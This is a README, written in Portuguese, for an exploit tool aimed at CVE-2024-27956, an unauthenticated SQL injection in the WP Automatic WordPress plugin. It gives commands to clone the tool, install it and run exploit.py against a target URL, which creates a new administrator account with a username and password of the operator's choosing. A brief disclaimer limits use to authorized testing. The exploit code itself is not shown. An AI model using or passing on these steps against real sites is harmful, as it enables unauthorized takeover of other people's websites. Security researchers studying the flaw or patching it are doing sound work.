
CVE-2024-27956 - Ferramenta de Exploração de Injeção SQL Automática do WP
Um exploit de prova de conceito para a vulnerabilidade de injeção SQL no plugin WP Automatic (CVE-2024-27956) que afeta sites WordPress.
Este exploit tem como alvo uma vulnerabilidade crítica de injeção SQL não autenticada no plugin WP Automatic (versões < 3.9.2.0) para WordPress. A vulnerabilidade permite que atacantes criem usuários administrativos e obtenham controle total de sites vulneráveis.
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url URL do WordPress alvo
optional arguments:
-h, --help mostra esta mensagem de ajuda e sai
-u USERNAME, --username USERNAME
Nome de usuário para a nova conta de administrador
-p PASSWORD, --password PASSWORD
Senha para a nova conta de administrador
Esta ferramenta é fornecida apenas para fins educacionais e de teste de penetração autorizados. O desenvolvedor não é responsável por qualquer uso indevido deste software. Sempre obtenha autorização adequada antes de testar qualquer sistema.
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.